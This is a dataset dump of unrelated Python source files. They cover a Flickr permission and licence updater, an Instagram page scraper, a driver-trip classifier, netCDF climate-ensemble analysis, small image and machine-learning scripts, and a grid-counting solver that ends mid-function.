text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python
# -*-coding:utf-8 -*
# **********************************************************************
# * SetPerm.py *
# * ---------- *
# * *
# **********************************************************************
# Bulk-updates a Flickr account: for every photoset except one excluded
# by title, normalises each photo's comment/metadata permissions from
# its visibility, and applies the CC BY-NC-ND licence.
# NOTE: Python 2 script (print statements, raw_input, xrange, and the
# old flickrapi two-step token flow).
# ======================================================================
# = Initializations =
# ======================================================================
# Modules
# =======
import sys
# import os.path
# import re
# import argparse
# import subprocess
# import fnmatch
import math
#import time
#import shutil
# , os.stat
# import flickrapi
sys.path.append('./python')
# NeferPhotos / NeferFlickr star-imports supply (at least) flickrapi,
# APIKey, APISecret and UserID used below.
from NeferPhotos import *
from NeferFlickr import *

NbError = 0    # number of photos whose update failed
PerPage = 500  # photos fetched per photoset page; Max 500

#Flickr authorization
flickr = flickrapi.FlickrAPI(APIKey, APISecret)
(token, frob) = flickr.get_token_part_one(perms="write")
if not token :
    raw_input("Press ENTER after you authorized this program")
flickr.get_token_part_two((token, frob))

# Fetch licence information
try :
    LicenceList = flickr.photos_licenses_getInfo()
except Exception, rc :
    print rc
    # NOTE(review): if getInfo raised, LicenceList is unbound here, so this
    # error report itself raises; the script also continues instead of
    # exiting (unlike the photoset-list failure below) — confirm intended.
    print "Error fetching licence info : %s / %s" % (
        LicenceList.find("err").get("code"),
        LicenceList.find("err").get("msg")
    )
# Find the Creative Commons "Attribution-NonCommercial-NoDerivs"
# licence (CC BY-NC-ND)
for Licence in LicenceList[0].findall('.//license') :
    if Licence.get("url").find("by-nc-nd") > 0 :
        print Licence.get("id"), Licence.get("name"), Licence.get("url")
        LicenceID = Licence.get("id")

# Photoset list
try :
    PhotosetList = flickr.photosets_getList(user_id=UserID)
except Exception, rc :
    print rc
    print "Error fetching photoset list : %s / %s" % (
        PhotosetList.find("err").get("code"),
        PhotosetList.find("err").get("msg")
    )
    exit(2)

for Photoset in PhotosetList[0].findall(".//photoset") :
    # Process every photoset except this one, which is skipped by title.
    if Photoset.find("title").text != "Kalarippayatt, par Flore Chapon" :
        SetID = Photoset.get("id")
        Name = Photoset.find("title").text
        CountP = int(Photoset.get("photos"))
        CountV = int(Photoset.get("videos"))
        # Number of result pages needed to walk the whole set
        Pages = int(math.ceil(float(CountP + CountV) / float(PerPage)))
        # for Page in range(Pages, 1, -1 ) :
        for Page in xrange(1, Pages+1) :
            try :
                PhotoList = flickr.photosets_getPhotos(
                    photoset_id=SetID, per_page=PerPage, page=Page)
            except Exception as rc :
                print rc
                print "Error retrieving photo list for \
photoset <%s> : %s / %s" % (
                    Name, PhotoList.find("err").get("code"),
                    PhotoList.find("err").get("msg")
                )
                continue
            print "%s : %i photos, %i videos, page %i/%i" % (
                Name, CountP, CountV, Page, Pages
            )
            Nb = 0
            for Photo in PhotoList[0] :
                PhotoID = Photo.get('id')
                Title = Photo.get('title')
                try :
                    PhotoInfo = flickr.photos_getInfo(photo_id=PhotoID)
                except Exception, rc :
                    print rc
                    print "Error getting info for <%s> in \
photoset <%s> : %s / %s" % (
                        Title, Name,
                        PhotoInfo.find("err").get("code"),
                        PhotoInfo.find("err").get("msg")
                    )
                    NbError += 1
                    continue
                # Current licence, visibility and permissions of the photo
                LicenceOri = PhotoInfo.find(".//photo").get("license")
                IsPublic = PhotoInfo.find(".//visibility").get("ispublic")
                IsFriend = PhotoInfo.find(".//visibility").get("isfriend")
                IsFamily = PhotoInfo.find(".//visibility").get("isfamily")
                PermComment = PhotoInfo.find(".//permissions").get("permcomment")
                PermAddmeta = PhotoInfo.find(".//permissions").get("permaddmeta")
                # Target permission codes depend on visibility (numeric codes
                # per the Flickr API — presumably "3" widest, "0" owner-only;
                # confirm against flickr.photos.setPerms docs).
                if IsPublic == "1" :
                    PermCommentNew = "3"
                    PermAddmetaNew = "1"
                elif IsFamily == "1" or IsFriend == "1" :
                    PermCommentNew = "1"
                    PermAddmetaNew = "1"
                else :
                    PermCommentNew = "0"
                    PermAddmetaNew = "0"
                # Log every photo that needs any change
                if PermComment != PermCommentNew or \
                   PermAddmeta != PermAddmetaNew or \
                   LicenceOri != LicenceID :
                    print "%s | %s %s %s | %s %s | %s" % (
                        LicenceOri, IsPublic, IsFriend, IsFamily,
                        PermComment, PermAddmeta, Title
                    )
                # Update permissions only when they differ from the target
                if PermComment != PermCommentNew or \
                   PermAddmeta != PermAddmetaNew :
                    try :
                        Result = flickr.photos_setPerms(
                            photo_id=PhotoID,
                            is_public=IsPublic, is_friend=IsFriend, is_family=IsFamily,
                            perm_comment=PermCommentNew, perm_addmeta=PermAddmetaNew
                        )
                    except Exception, rc :
                        print rc
                        print "Error setting perms for <%s> in \
photoset <%s> : %s / %s" % (
                            Title, Name,
                            Result.find("err").get("code"),
                            Result.find("err").get("msg")
                        )
                        NbError += 1
                        continue
                # Update the licence only when it differs from CC BY-NC-ND
                if LicenceOri != LicenceID :
                    try :
                        Result = flickr.photos_licenses_setLicense(
                            photo_id=PhotoID , license_id=LicenceID
                        )
                    except Exception, rc :
                        print rc
                        print "Error setting licence for <%s> in \
photoset <%s> : %s / %s" % (
                            Title, Name,
                            Result.find("err").get("code"),
                            Result.find("err").get("msg")
                        )
                        NbError += 1
                        continue
                Nb += 1
                # Progress marker every 10 processed photos
                if Nb % 10 == 0 :
                    print Nb

if NbError > 0 :
    print "%i photos could not be updated" % (NbError)
|
import re
import sys

# Loose URL validator: scheme (http/https/ftp/ftps), then a dotted domain,
# "localhost", or a dotted-quad IP, an optional port, and an optional
# path/query. Pattern text is unchanged from the original.
_URL_PATTERN = (
    r'^(?:http|ftp)s?://'
    r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
    r'localhost|'
    r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
    r'(?::\d+)?'
    r'(?:/?|[/?]\S+)$'
)
regex = re.compile(_URL_PATTERN, re.IGNORECASE)
class Downloader:
    """Placeholder download handler that logs its lifecycle to stdout."""

    def __init__(self):
        # Fix: the original message misspelled "initated".
        print("Object initiated")
        super().__init__()

    def __del__(self):
        # Called on garbage collection; purely informational.
        print("object cleared")
if __name__ == "__main__":
    # Echo the CLI arguments, check the first one against the URL regex,
    # then smoke-test the Downloader lifecycle.
    print(sys.argv)  # include script name
    print(sys.argv[1:])  # exclude script name
    looks_like_url = re.match(regex, sys.argv[1]) is not None
    print(looks_like_url)
    test = Downloader()
    print("test end...")
|
__author__ = 'nikosteinhoff'
import numpy as np
from src import feature_extraction
from src.boxcox_transformer import BoxCoxTransformer
import src.model_specifications as model_specs
from src.model_specifications import Model
from sklearn import preprocessing
from sklearn import cross_validation
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
def calculate_driver(driver, rebuild_dataset=False):
    """Classify one driver's trips and attach a rank-based calibration score.

    :param driver: driver identifier passed to feature extraction
    :param rebuild_dataset: if True, rebuild the cached feature data set
    :return: (driver_results, models) — driver_results stacks the driver id,
             trip id, model probability and a 0–100 calibration score per trip
    """
    print("Calculating driver {0}".format(driver))
    data = feature_extraction.build_data_set(driver, rebuild_dataset)
    probabilities, models = classify_data(data)
    # Rank trips by predicted probability, attach a linear 0-100 score in
    # rank order, then restore the original trip-id ordering.
    sorted_probabilities = probabilities[probabilities[:, 1].argsort()]
    # NOTE(review): linspace of length 200 assumes exactly 200 trips per
    # driver; column_stack fails otherwise — confirm against the data set.
    calibration = np.linspace(0, 100, 200)
    calibrated_probabilities = np.column_stack((sorted_probabilities, calibration))
    sorted_calibrated_probabilities = calibrated_probabilities[calibrated_probabilities[:, 0].argsort()]
    driver_results = np.column_stack((np.ones((sorted_calibrated_probabilities.shape[0], 1))*driver,
                                      sorted_calibrated_probabilities))
    return driver_results, models
def classify_data(data):
    """Cross-validate all configured models, refit the best one on the full
    data set, and score the driver's own (class-1) trips.

    :param data: matrix whose col 0 is the target, col 1 the trip id and the
                 rest the features (see split_data_target_id)
    :return: (trip_probabilities, models) — trip ids stacked with the best
             model's P(class 1) scores, plus the dict of all fitted models
    """
    x, y, trip_id = split_data_target_id(data)
    # Box-Cox de-skewing is wired in but disabled by this flag.
    use_boxcox_transform = False
    # Instantiate one wrapper per configured model specification.
    models = {}
    for name, model in model_specs.model_specifications.items():
        models[name] = Model(model, name)
    # NOTE(review): sklearn.cross_validation is the pre-0.18 module; this
    # code requires an old scikit-learn version.
    kf = cross_validation.StratifiedKFold(y, n_folds=5, random_state=123)
    for train_index, test_index in kf:
        x_train, x_test = x[train_index], x[test_index]
        y_train, y_test = y[train_index], y[test_index]
        # Remove skewness
        if use_boxcox_transform:
            bc_transformer = BoxCoxTransformer()
            bc_transformer.fit(x_train)
            x_train = bc_transformer.transform(x_train)
            x_test = bc_transformer.transform(x_test)
        # Normalization (fit on the training fold only to avoid leakage)
        scale = preprocessing.StandardScaler().fit(x_train)
        x_train = scale.transform(x_train)
        x_test = scale.transform(x_test)
        # Training
        for model in models.values():
            model.fit_model(x_train, y_train)
        # Evaluation
        for model in models.values():
            y_predict = model.predict_probabilities(x_test)[:, 1]
            model.score_model(y_test, y_predict)
    # Select the model with the best cv-rocauc
    best_model = pick_best_model(models)
    best_model.fitted = None  # drop the fold-fitted estimator before the final fit
    # Pre-processing
    # Remove skewness
    bc_transformer = BoxCoxTransformer()
    if use_boxcox_transform:
        bc_transformer.fit(x)
        x = bc_transformer.transform(x)
    final_scale = preprocessing.StandardScaler().fit(x)
    x_final = final_scale.transform(x)
    # Final fit on complete data set
    best_model.fit_model(x_final, y)
    # Prediction: score only this driver's own trips (label 1)
    original_cases = y == 1
    x_predict = x[original_cases]
    trip_id_predict = trip_id[original_cases]
    if use_boxcox_transform:
        x_predict = bc_transformer.transform(x_predict)
    x_predict = final_scale.transform(x_predict)
    y_scores = best_model.predict_probabilities(x_predict)[:, 1]
    trip_probabilities = np.column_stack((trip_id_predict, y_scores))
    return trip_probabilities, models
def split_data_target_id(data):
    """Split the combined matrix into features, target and trip id.

    Column 0 holds the target label, column 1 the trip id, and all
    remaining columns form the feature matrix.
    """
    target = data[:, 0]
    trip_id = data[:, 1]
    features = data[:, 2:]
    return features, target, trip_id
def pick_best_model(model_objects):
    """Return the model with the highest average CV score.

    Replaces the former double scan (max() followed by list.index()) with a
    single keyed max(); ties still resolve to the earliest-inserted model.
    The winner is marked with ``count = 1`` as before.

    :param model_objects: dict of name -> model, each exposing avg_score
    :return: the best-scoring model object
    """
    best_model = max(model_objects.values(), key=lambda m: m.avg_score)
    best_model.count = 1
    return best_model
def explore_data(data):
    """Write a histogram of every column of *data* to plots.pdf, one page
    per column.

    :param data: 2-D array; each column is histogrammed separately
    :return: None (side effect: plots.pdf written in the working directory)
    """
    plt.interactive(False)
    pp = PdfPages('plots.pdf')
    for i in range(data.shape[1]):
        column = data[:, i]
        plt.hist(column)
        pp.savefig()
        plt.clf()  # clear the figure so pages do not accumulate
    pp.close()
    return
if __name__ == '__main__':
    # Smoke-run on driver 1 without rebuilding the cached features;
    # calculate_driver returns (driver_results, models) — print both parts.
    for part in calculate_driver(1, False):
        print(part)
    print("Done!")
from PIL import Image
from shutil import copyfile
import os

# Copies <name>.png/.jpeg/.jpg (next to this script) to output.<ext>, then
# whitens every pixel that differs from the top-left pixel — i.e. keeps the
# "background" colour and blanks everything else — and saves in place.
orgfile = input('File name (without .jpeg or .png): ')
orgfile = os.path.dirname(os.path.abspath(__file__)) + '/' + orgfile
mode = ''
# Try the supported extensions in turn; the first existing file wins.
try:
    file = orgfile + '.png'
    outputfile = copyfile(file, 'output.png')
    mode = 'png'
except FileNotFoundError:
    try:
        file = orgfile + '.jpeg'
        outputfile = copyfile(file, 'output.jpeg')
        mode = 'jpg'
    except FileNotFoundError:
        try:
            file = orgfile + '.jpg'
            outputfile = copyfile(file, 'output.jpg')
            mode = 'jpg'
        except FileNotFoundError:
            print("File not supported (check if you've written the right file name)")
            exit()

img = Image.open(outputfile)
# Reference pixel: everything not matching it gets overwritten.
firstpix = img.getpixel((0,0))
for y in range(img.height):
    for x in range(img.width):
        if img.getpixel((x,y)) != firstpix:
            if (mode == 'jpg'):
                img.putpixel((x,y), (255,255,255))
            if (mode == 'png'):
                # NOTE(review): (255) is just the int 255, which only suits
                # single-band ('L'/'P') images; an RGB(A) PNG would need a
                # full tuple — confirm input PNGs are grayscale/paletted.
                img.putpixel((x,y), (255))
img.save(outputfile)
from simplejson import loads
import requests
from django.core.management.base import BaseCommand
def request_func(url=None):
    """GET *url* with a desktop-browser User-Agent.

    :param url: URL to fetch.
    :return: (True, response body bytes) on HTTP 200, otherwise
             (False, dict describing the failure).
    """
    header = {
        "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
        "accept-language": "en-US,en;q=0.8",
        "X-Proxy-Country": "US"
    }
    try:
        # NOTE(review): verify=False disables TLS certificate verification —
        # confirm this is intentional (proxy interception?).
        req = requests.request('GET', url=url, headers=header, timeout=25, verify=False)
        if req.status_code == 200:
            return True, req.content
        else:
            return False, {"error": "request failed: not 200", "status code": str(req.status_code), "url": url}
    except Exception:
        # Fix: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt. Any request failure yields an error dict.
        return False, {"error": "request failed: request function try except", "url": url}
def parse_ins(req_content=None):
    """Extract the ``window._sharedData`` JSON object embedded in an
    Instagram profile page.

    :param req_content: raw page body as bytes
    :return: the decoded dict on success, else a dict with an 'error' key
    """
    try:
        marker = "window._sharedData = ".encode("utf-8")
        # Everything after the marker, up to the closing "};</script>",
        # re-terminated with "}" and with escaped quotes stripped.
        payload = req_content[req_content.index(marker) + len(marker):]
        end = payload.index("};</script>".encode("utf-8"))
        blob = (payload[:end] + str("}").encode("utf-8")).replace(
            str('\\"').encode("utf-8"), str("").encode("utf-8"))
        return loads(blob)
    except Exception as e:
        return {'error': 'parse ins function try except'+ str(e)}
class Command(BaseCommand):
    """Django management command: fetch one hard-coded Instagram profile
    page and return its embedded shared-data JSON."""

    def handle(self, *args, **kwargs):
        # Returns the parsed dict on success; on failure returns either the
        # error dict produced by request_func or a handler-level error dict.
        try:
            url = "https://www.instagram.com/animeromance___/"
            success, content = request_func(url=url)
            if success:
                return parse_ins(req_content=content)
            else:
                return content
        except Exception as e:
            return {"error": "handler function try except: " + str(e)}
|
import numpy
import theano
import theano.tensor as T

rng = numpy.random

# Logistic regression on random data, trained by plain gradient descent.
N=100                 # number of samples
feats=3               # features per sample
# D = (design matrix of shape (N, feats), binary labels of length N)
D = (rng.randn(N, feats), rng.randint(size=N, low=0, high=2))
training_steps=100
regFactor=0.01        # L2 regularisation strength
lr=0.01               # learning rate

# Symbolic inputs and shared parameters
x = T.matrix("x")
y = T.vector("y")
w = theano.shared(rng.randn(feats), name="w")
b = theano.shared(0, name="b")

# Sigmoid giving P(y=1 | x)
# NOTE(review): T.dot(w, x) treats *columns* of x as samples, yet train()
# is fed D[0] of shape (N, feats) — this looks like it should be
# T.dot(x, w); confirm the intended orientation.
pred_score = 1 / (1 + T.exp(-T.dot(w, x) - b))
pred = pred_score > 0.5
# Per-sample binary cross-entropy
crossEnt = -y * T.log(pred_score) - (1 - y) * T.log(1 - pred_score)
# Mean loss plus L2 penalty on the weights
cost = crossEnt.mean() + regFactor * (w ** 2).sum()
gw, gb = T.grad(cost, [w, b])

# Compiled gradient-descent step and prediction function
train = theano.function(inputs=[x,y], outputs=[pred, crossEnt], updates=((w, w - lr * gw), (b, b - lr * gb)))
predict = theano.function(inputs=[x], outputs=pred)

for i in range(training_steps):
    pred, err = train(D[0], D[1])

print("Final model:")
print(w.get_value())
print(b.get_value())
print("target values for D:")
print(D[1])
print("prediction on D:")
print(predict(D[0]))
|
import sys
import time
from scipy import interpolate
from utils import *
import matplotlib.pyplot as plt
from netCDF4 import Dataset
from nco import Nco
import directories
def extract_data(algae_type, variables, start_date, end_date, num_ens, monthly=False, lat=None, lon=None,
                 grid=False, mask=None):
    """
    Extracts the data given by the user and stores them
    :param algae_type: name of prefix of filename to look into
    :param variables: list of variables to extract from files e.g. ['temp', 'sal']
    :param start_date: start date given by user, [day, month, year]
    :param end_date: end date given by user, [day, month, year]
    :param num_ens: number of ensembles, int
    :param monthly: data is stored in monthly increments (time = 12) else assumed (time = 365)
    :param lat: latitude, set if grid or sample point, floats
    :param lon: longitude, set if grid or sample point, floats
    :param grid: set if grid point is given
    :param mask: set if mask file is given, file containing the boolean array of mask to go over grid, string
    :return: dictionary storing arrays or list of arrays:
             e.g. if only one file inputted and variables = ['temp', 'sal'], then
                  dict = {'temp': [...], 'sal': [...]
             if multiple files inputted and variables = ['temp', 'sal'], then
                  dict = {'temp': [ [..], [..], ..], 'sal': [ [..], [..], ..]
             units: units of variables
             files: the data nc files that will be used by write_means_to_netcdf_file
             nan_values: per-variable missing_value sentinels
    """
    # Check if sample point (lat/lon given but not flagged as a grid point)
    sample = False
    if lat and lon and not grid:
        sample = True
    # Get day, month and year
    day_s, mon_s, yr_s = start_date[0], start_date[1], start_date[2]
    day_e, mon_e, yr_e = end_date[0], end_date[1], end_date[2]
    # Get path
    path = directories.CLIMATE_DATA
    # Get files and min and maximum year
    files, min_yr, max_yr = get_files_time_period(algae_type, yr_s, yr_e)
    # Save list of dictionaries - each dict in the list is an ensemble
    saved = [{} for _ in range(num_ens)]
    # Save the units of the variables to use later
    save_units = True  # only save in the first for loop
    units = {}
    save_mask = True   # only save mask in the first for loop
    mask_arr = None
    nan_values = {}
    for file in files:
        # For each relevant file, make dataset and get variable data
        dataset = Dataset(os.path.join(path, file), 'r')
        # Get file ensemble number
        ens_num = get_ens_num(file)
        # Get corresponding index in list
        indx = ens_to_indx(ens_num)
        # Grid point: Get size and name of dimensions
        time_size, lat_size, lon_size = None, None, None
        time_name, lat_name, lon_name = 'time', None, None
        # If grid and sample point, save names and size of time, latitude and longitude
        if grid or sample or mask:
            for dd in dataset.dimensions:
                if dd == time_name:
                    time_size = dataset.dimensions[dd].size
                # Latitude dims are assumed to start with 'y' or 'lat',
                # longitude dims with 'x' or 'lon'.
                if dd[0].lower() == 'y' or dd[:3].lower() == 'lat':
                    lat_size = dataset.dimensions[dd].size
                    lat_name = dd
                if dd[0].lower() == 'x' or dd[:3].lower() == 'lon':
                    lon_size = dataset.dimensions[dd].size
                    lon_name = dd
        # If mask, then save mask array for only the first loop
        # Check if mask
        if mask and save_mask:
            # open file and save a np array
            # NOTE(review): np.int is deprecated/removed in NumPy >= 1.20;
            # this line requires an older NumPy.
            try:
                mask_arr = np.loadtxt(mask, usecols=range(lon_size), dtype=np.int)
                save_mask = False
            except IndexError:
                print("Error: extract_data function: mask file does not have correct latitude and longitude.")
                sys.exit()
        # Save the data for each variable
        for var in variables:
            if save_units:  # Save for only the first file
                nan_val = dataset.variables[var].missing_value
                nan_values[var] = nan_val
            ds = np.array(dataset.variables[var])
            # If we have grid or sample point
            if grid or sample:
                # Check that dimensions match : Note this only works with 3d data
                if (time_size, lat_size, lon_size) == ds.shape:
                    # Get lat and lon array
                    lat_arr, lon_arr = np.array(dataset.variables[lat_name]), np.array(dataset.variables[lon_name])
                    if grid:
                        # Get index of closest value to lat and lon in arrays
                        lat_indx, lon_indx = find_nearest(lat_arr, lat), find_nearest(lon_arr, lon)
                        # Get specific grid point in variable
                        ds = ds[:, lat_indx, lon_indx]
                    if sample:
                        # Bilinear interpolation of each time slice at (lon, lat)
                        ds_ = []
                        for j in range(ds.shape[0]):
                            f = interpolate.interp2d(lon_arr, lat_arr, ds[j])
                            ds_.append(f(lon, lat))
                        # Replace ds
                        ds = np.asarray(ds_).flatten()
                else:
                    print("Error: extract_data function: Dimensions do not match with variables.")
                    sys.exit()
            if save_units:  # Save the units for only the first file
                unit = dataset.variables[var].units
                units[var] = unit
            # Check if variable name is already in dict, if so add to the list in dict
            if var in saved[indx]:
                cur_d = saved[indx].get(var)
                # Concatenate list saved and new list (appends along time)
                ds = np.concatenate((cur_d, ds))
            if mask:
                # use mask to select relevant point in grid; masked cells are
                # filled with the variable's missing value
                for i in range(ds.shape[0]):
                    d = np.ma.array(ds[i], mask=mask_arr, fill_value=nan_values[var])
                    ds[i] = d.filled()
            # Save variable name and data in the dict
            saved[indx][var] = ds
        # Close datset
        dataset.close()
        # Do not save units anymore, since we have all units now
        save_units = False
    # Get specific time frame
    till_start, till_end = get_diff_start_end(start_date, end_date, min_yr=min_yr, monthly=monthly)
    # For multiple years in one file, the dicts in saved should have shape of max_yr - min_yr + 1
    # If days are reduced then select time frame
    # NOTE(review): this slice assumes 3-D (time, lat, lon) data and so will
    # fail for grid/sample extractions that reduced ds to 1-D — confirm.
    if (till_end - till_start) != saved[0][variables[0]].shape[0]:
        for var in variables:
            for indx in range(num_ens):
                saved[indx][var] = saved[indx][var][till_start:till_end, :, :]
    return saved, units, files, nan_values
def create_histogram(list_ens, units, start_date, end_date, nan_values, monthly=False, save_out=None,
                     cov=None, sel=None, plot=False):
    """
    Analysis the data given - in this case it computes the histogram (assumes grid/sample point)
    :param list_ens: the list of ensembles (dicts) containing the data of the climate variables
    :param units: the units matching to each variable
    :param start_date: start date given by user
    :param end_date: end date given by user
    :param nan_values: the missing values in the variables data array
    :param monthly: data is stored in monthly increments (time = 12) else assumed (time = 365)
    :param save_out: if set, then save output of histogram/timeseries
    :param cov: if set, then perform covariance analysis
    :param sel: selection option for bin size, default is fd - Freedman Diaconis Estimator
    :param plot: if plot is true, then shows plot of histogram
    :return: None
    """
    if not sel:
        sel = 'fd'
    # One subplot per (ensemble, variable); squeeze=False keeps 2-D indexing.
    fig, axs = plt.subplots(len(list_ens), len(list_ens[0]), squeeze=False)
    time_str = "daily"
    if monthly:
        time_str = "monthly"
    fig.suptitle("Variables " + str(list(list_ens[0])) + " measured " + time_str + " between " + str(start_date[0]) +
                 "-" + str(start_date[1]) + "-" + str(start_date[2]) + " and " + str(end_date[0]) + "-" +
                 str(end_date[1]) + "-" + str(end_date[2]) + " using the E2S2M climate model")
    # a = variable (column) index, e = ensemble (row) index
    a, e = 0, 0
    for dict_ in list_ens:
        axs[e, a].set_title("Ensemble " + str(e))
        for d in dict_:
            # Drop the missing-value sentinels before histogramming
            ens = dict_[d].flatten()
            indices = np.argwhere(np.isclose(ens, nan_values[d]))
            ens = np.delete(ens, indices)
            hist, bin_edges = np.histogram(ens, bins=sel)
            print(ens)
            if plot and not cov:
                axs[e, a].hist(ens, bins=sel)
                axs[e, a].set_ylabel("Frequency")
                axs[e, a].set_xlabel(d + ' (' + units[d] + ')')
            # a += 1
            # NOTE(review): `a` is never incremented (commented out above),
            # so every variable plots into column 0 — confirm intended.
            if plot and cov:  # If covariance between 2 variables, plot a 2d histogram
                axs[a].hist2d(ens, bins=sel)
        e += 1
    plt.show()
    return None
def create_timeseries(list_ens, units, start_date, end_date, monthly=False, save_out=None, cov=None):
    """Compute the timeseries analysis for grid/sample-point data.

    Not implemented yet — currently a stub that accepts the same arguments
    as create_histogram (minus histogram-specific options) and does nothing.

    :param list_ens: the list of ensembles (dicts) with the climate variables
    :param units: the units matching to each variable
    :param start_date: start of the time frame to analyse
    :param end_date: end of the time frame to analyse
    :param monthly: data stored in monthly increments (time = 12) else daily
    :param save_out: if set, save the timeseries output
    :param cov: if set, perform covariance analysis
    :return: None
    """
    return None
def compute_average(list_ens, nan_values):
    """Compute the time-mean of every variable in every ensemble.

    :param list_ens: list of ensembles; each is a dict of variable -> array
                     whose first axis is time
    :param nan_values: dict of variable -> missing-value sentinel
    :return: list of dicts (one per ensemble) of variable -> mean array
    """
    ens_means = []
    for ensemble in list_ens:
        variable_means = {}
        for var_name, values in ensemble.items():
            # Average over the leading (time) axis
            avg = np.mean(values, axis=0)
            # Snap values near the missing-value sentinel back to the exact
            # sentinel so downstream code can recognise them (skip scalars).
            if avg.shape:
                avg[np.isclose(avg, nan_values[var_name], rtol=1)] = nan_values[var_name]
            variable_means[var_name] = avg
        ens_means.append(variable_means)
    return ens_means
def write_means_to_netcdf_file(files, ens_means, variables, start_date, end_date, argv, test=False):
    """
    Write means computed in netcdf files
    :param files: initial files
    :param ens_means: ensemble means calculated calling function compute_average
    :param variables: list of variables
    :param start_date: start date list in [day, month, year] format
    :param end_date: end date list in [day, month, year] format
    :param argv: string containing command line arguments used
    :param test: if test is true, make some changes specific to files on my pc
    :return: None, files created in folder analysis/ensemble_means
    """
    # Initialise Nco
    nco = Nco()
    # Start and end date string
    start_end_str = str(start_date[0]) + "-" + str(start_date[1]) + "-" + str(start_date[2]) + " and " + \
                    str(end_date[0]) + "-" +str(end_date[1]) + "-" + str(end_date[2])
    # Get path
    path = directories.CLIMATE_DATA
    # Get normal and files in absolute path saved in ensemble groups
    ens_files = [[] for _ in range(len(ens_means))]
    abs_files = [[] for _ in range(len(ens_means))]
    # Get absolute path of each file
    for i in range(len(files)):
        # Get file ensemble number index
        ens_indx = ens_to_indx(get_ens_num(files[i]))
        # save in ens_files
        ens_files[ens_indx].append(files[i])
        # Get absolute path
        joined = os.path.abspath(os.path.join(path, files[i]))
        if test:
            # Workaround for a differing user directory on the dev machine
            joined = joined.replace("Adanna Akwataghibe", "Adanna")
        # save in abs_files
        abs_files[ens_indx].append(joined)
    # Get folder to store ensemble means
    results = directories.ANALYSIS
    mean_folder = os.path.abspath(os.path.join(results, directories.MEANS))
    if test:
        mean_folder = mean_folder.replace("Adanna Akwataghibe", "Adanna")
    # Go through ensembles, merge files to get output and write to output
    for i in range(len(ens_means)):
        # Get first file name in specific ensemble and add last year to name - use as output file name
        output_file = ""
        if ens_files[i][0].endswith(".nc"):
            output_file = ens_files[i][0][:-3] + '_' + str(end_date[2]) + '.nc'
        output_file = os.path.join(mean_folder, output_file)
        # Merge files in ensemble in output_file
        nco.ncecat(input=abs_files[i], output=output_file)
        # Write means to file: copy each variable's metadata from the first
        # source file and append a '<var>_mean' variable holding the mean.
        with Dataset(abs_files[i][0], 'r') as src, Dataset(output_file, 'a') as dest:
            for var in variables:
                # create dataset identical to original variable in file
                mean_var_name = var + '_mean'
                datatype = src.variables[var].datatype
                # Get dimensions without time (the mean collapses the time axis)
                dims = src.variables[var].dimensions[1:]
                mean_var = dest.createVariable(mean_var_name, datatype, dims)
                # save means in variable
                mean_var[:] = ens_means[i][var][:]
                mean_var.setncatts(src[var].__dict__)
                mean_var.long_name = mean_var.long_name + ' averaged between ' + start_end_str
            # Write to description and history of file
            desc_str = "Added averages of variables " + ', '.join(variables) + " within time period " + \
                       start_end_str
            if 'description' in dest.ncattrs():
                dest.description = desc_str + ' \n' + dest.description
            else:
                dest.description = desc_str
            dest.history = time.ctime(time.time()) + ': Commands used to produce file: ' + argv + ' \n' + \
                           time.ctime(time.time()) + ': Functions used: extract_data, compute_average,' \
                           ' write_means_to_netcdf_file' + ' \n' + dest.history
    # NOTE(review): a space is missing before "folder." in this message.
    print("Mean ensemble files created in " + os.path.join(directories.ANALYSIS, directories.MEANS) + "folder.")
def plot_graph(file):
    """
    Plot the data given in file
    :param file: netCDF file from analysis containing 'mean_air_temperature'
    :return: None (side effect: image saved next to the input as a .png)
    """
    # Open file, read the mean field, and close the dataset again
    dataset = Dataset(file, 'r')
    d = np.array(dataset.variables['mean_air_temperature'])
    dataset.close()  # fix: the dataset handle was previously leaked
    fig, ax = plt.subplots()
    ax.imshow(d)
    # Fix: the old `file.rstrip('nc') + 'png'` stripped a *character set*
    # ('n'/'c') from the right, mangling names that do not end in ".nc";
    # splitext swaps the extension correctly.
    png_file = os.path.splitext(file)[0] + '.png'
    fig.savefig(png_file)
    print("Image is saved in the " + directories.ANALYSIS + " folder as a png file.")
    return None
|
from database import Database
from menu import Menu

__author__ = 'dhairya'

# Entry point: set up the backing store, then hand control to the
# interactive menu loop.
Database.initialize()
menu = Menu()
menu.run_menu()
|
import sys
import heapq
import numpy as np
from math import factorial
def solution(W, H, P, Q, N, X, Y, a, b, c, d):
    """Generate the N dead-cell coordinates from the linear recurrence and
    count the valid P x Q window positions via sol()."""
    xs = [X] * N
    ys = [Y] * N
    for i in range(1, N):
        # Each point is derived from the previous one, modulo the grid size.
        xs[i] = (xs[i - 1] * a + ys[i - 1] * b + 1) % W
        ys[i] = (xs[i - 1] * c + ys[i - 1] * d + 1) % H
    deads = zip(xs, ys)
    return sol(W, P, H, Q, deads)
def sol(W, P, H, Q, deads):
    # Count the anchor positions (i, j) of a P x Q window inside a W x H
    # grid whose window contains no dead cell. (Python 2: print statements.)
    # matrix[i, j] == 1 marks anchors whose window would cover a dead cell.
    matrix = np.zeros((W, H))
    c = 0  # progress counter over dead cells
    for d in deads:
        c += 1
        print c
        # A dead cell at (dx, dy) invalidates every anchor in the rectangle
        # [dx-P+1, dx] x [dy-Q+1, dy], clamped to the grid edge.
        matrix[max(0, d[0] - P + 1):d[0] + 1, max(0, d[1] - Q + 1):d[1] + 1] = 1
        # for i in range(max(0, d[0] - P+ 1), d[0] +1):
        # for j in range(max(0, d[1] - Q + 1), d[1] + 1):
        # matrix[i,j] = 1
    #print matrix
    count = 0
    # Only anchors keeping the window fully inside the grid are considered.
    for j in range(H-Q +1):
        for i in range(W-P+1):
            print i,j
            if matrix[i,j] == 0:
                count += 1
    return count
def fastsol(W, P, H, Q, deads):
    # Variant of sol() that marks invalid anchors cell by cell, walking each
    # dead cell's rectangle from the dead cell outward and bailing out early
    # when it runs into cells already marked by a previous dead cell.
    # (Python 2: print statements; mutates the `deads` list by sorting it.)
    matrix = np.zeros((W, H))
    deads.sort(key=lambda x: sorted(list(x), reverse=True))
    #print deads
    c = 0  # progress counter
    for x, y in deads:
